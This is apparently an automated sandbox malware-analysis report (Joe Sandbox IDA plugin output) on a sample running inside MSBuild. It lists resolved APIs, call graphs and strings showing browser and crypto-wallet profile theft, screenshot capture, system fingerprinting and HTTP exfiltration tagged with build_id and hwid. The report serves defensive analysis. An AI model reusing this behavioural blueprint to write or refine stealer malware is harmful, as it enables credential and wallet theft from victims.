91352 41210d 91351->91352 91359 411ff0 91351->91359 91352->90144 91353 4120f2 strtok_s 91353->91352 91353->91359 91354 4120c4 StrCmpCA 91354->91359 91355 412026 StrCmpCA 91355->91359 91356 412098 StrCmpCA 91356->91359 91357 41206c StrCmpCA 91357->91359 91358 40feb0 lstrlen lstrcpy 91358->91359 91359->91353 91359->91354 91359->91355 91359->91356 91359->91357 91359->91358 91361 40fe20 lstrcpy 91360->91361 91362 415693 91361->91362 91363 40ffe0 3 API calls 91362->91363 91364 4156a9 91363->91364 91365 40ff00 lstrcpy 91364->91365 91366 4156b6 91365->91366 92001 402420 91366->92001 91369 40ff50 2 API calls 91370 4156de 91369->91370 91371 40ff00 lstrcpy 91370->91371 91372 4156eb 91371->91372 91373 40ffe0 3 API calls 91372->91373 91374 415713 91373->91374 91375 40ff00 lstrcpy 91374->91375 91376 415720 91375->91376 91377 40ffe0 3 API calls 91376->91377 91378 41573c 91377->91378 91379 40ff00 lstrcpy 91378->91379 91380 415749 91379->91380 91381 40ffe0 3 API calls 91380->91381 91382 415765 91381->91382 91383 40ff00 lstrcpy 91382->91383 91384 415772 91383->91384 92004 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 91384->92004 91386 415782 91387 40ffe0 3 API calls 91386->91387 91388 41578f 91387->91388 91389 40ff00 lstrcpy 91388->91389 91390 41579c 91389->91390 91391 40ffe0 3 API calls 91390->91391 91392 4157b8 91391->91392 91393 40ff00 lstrcpy 91392->91393 91394 4157c5 91393->91394 91395 40ffe0 3 API calls 91394->91395 91396 4157e1 91395->91396 91397 40ff00 lstrcpy 91396->91397 91398 4157ee 91397->91398 92005 410c30 memset RegOpenKeyExA 91398->92005 91400 4157fe 91401 40ffe0 3 API calls 91400->91401 91402 41580b 91401->91402 91403 40ff00 lstrcpy 91402->91403 91404 415818 91403->91404 91405 40ffe0 3 API calls 91404->91405 91406 415834 91405->91406 91407 40ff00 lstrcpy 91406->91407 91408 415841 91407->91408 91409 40ffe0 3 API calls 91408->91409 91410 41585d 91409->91410 91411 40ff00 lstrcpy 91410->91411 91412 41586a 91411->91412 91413 410cd0 2 API calls 91412->91413 

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 555 4185a0-4185b2 LoadLibraryA 556 4187c7-418826 LoadLibraryA * 5 555->556 557 4185b8-4187c2 GetProcAddress * 21 555->557 558 418828-418836 GetProcAddress 556->558 559 41883b-418842 556->559 557->556 558->559 561 418844-41886a GetProcAddress * 2 559->561 562 41886f-418876 559->562 561->562 563 418878-418886 GetProcAddress 562->563 564 41888b-418892 562->564 563->564 565 418894-4188a2 GetProcAddress 564->565 566 4188a7-4188ae 564->566 565->566 567 4188b0-4188d5 GetProcAddress * 2 566->567 568 4188da 566->568 567->568
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00E2A8A0), ref: 004185C0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA98), ref: 004185ED
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAB0), ref: 00418606
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A960), ref: 0041861E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A978), ref: 00418636
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2E4F0), ref: 0041864F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B78), ref: 00418667
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33918), ref: 0041867F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AB58), ref: 00418698
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAF8), ref: 004186B0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AB70), ref: 004186C8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA08), ref: 004186E1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33938), ref: 004186F9
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A888), ref: 00418711
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A8B8), ref: 0041872A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33978), ref: 00418742
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA38), ref: 0041875A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAC8), ref: 00418773
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B18), ref: 0041878B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A930), ref: 004187A3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33BF8), ref: 004187BC
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A9D8), ref: 004187CD
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2AA20), ref: 004187DF
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A8D0), ref: 004187F1
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A918), ref: 00418802
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A948), ref: 00418814
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E2A990), ref: 00418830
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E2AA50), ref: 0041884C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E2AA80), ref: 00418864
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E2AB88), ref: 00418880
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00E33BB8), ref: 0041889C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00E2E490), ref: 004188B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004188CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: 89$NtQueryInformationProcess$kernel32.dll$x9$x;
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00426A8A,00426A87,00000000,?,00426BC8,?,?,00426A86,?,00000000,00000005), ref: 0040D3D4
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426BCC), ref: 0040D43C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426BD0), ref: 0040D456
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426BD4,?,?,00426A8B), ref: 0040D504
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID: Brave$E$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$p@$p@E
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404774
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 004047B5
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004047DB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,0041FDC9,?,?,?,00426885,00000000,0041FDC9,?,00000000,0041FDC9,",00000000,0041FDC9,build_id), ref: 00404AAA
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404AC3
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD4
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404AEB
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404B3F
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404B4A
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404B5F
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404B69
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                                            • String ID: !$"$"$------$------$------$`h$build_id$hwid
                                                                                                                                                                                                                                                                            • API String ID: 1585128682-3662324238
                                                                                                                                                                                                                                                                            • Opcode ID: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                            • Instruction ID: 5fc5c06e662f0cc56ec579075a690d6072dddc9a0b5f03a20420b071163eae1a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E222C71801149EADB15E7E4C952BEEBBB8AF15304F54407EE601731D2DF782B0CCAA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CB3F688,00001000), ref: 6CAB35D5
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAB35E0
                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CAB35FD
                                                                                                                                                                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAB363F
                                                                                                                                                                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAB369F
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB36E4
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CAB3773
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAB377E
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAB37BD
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CAB37C4
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAB37CB
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAB3801
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB3883
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CAB3902
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CAB3918
                                                                                                                                                                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CAB394C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$File$CopyFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(004273F4,?,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 00411140
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 0041114C
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC), ref: 00411153
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411197
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041117F
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411DCA
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411DD7
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411DDE
                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411DE7
                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DF8
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411E03
                                                                                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411E23
                                                                                                                                                                                                                                                                            • GlobalFix.KERNEL32(000000FF), ref: 00411E9D
                                                                                                                                                                                                                                                                            • GlobalSize.KERNEL32(000000FF), ref: 00411EAA
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00411F29
• DeleteObject.GDI32(00000000), ref: 00411F47
• DeleteObject.GDI32(00000000), ref: 00411F4E
• ReleaseDC.USER32(00000000,00000000), ref: 00411F56
• CloseWindow.USER32(00000000), ref: 00411F5D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
• String ID: image/jpeg
• API String ID: 1311022706-3785015651
• Opcode ID: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
• Instruction ID: 955233e89dab8965993365ce23471f417d3a05ebbc493c96f06fa7f3e3f93d87
• Opcode Fuzzy Hash: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
• Instruction Fuzzy Hash: 6A716CB5900218AFDB10DFE4DD45BEEBBB9EF49704F10412EFA05A3291D7386A05CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,004020FB,?,00423330,?,00000000,00000000,?,00000000), ref: 00401446
• StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004014BC
• StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 004014D6
• FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,004020FB,?,00423340,?,00000000), ref: 00401603
  • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
  • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
  • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
  • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
  • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
  • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
  • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
  • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
• DeleteFileA.KERNEL32(00000000), ref: 00401894
• FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 004018D7
• FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 004018E6
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040180E
  • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
  • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
  • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
  • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
  • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
  • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401B61
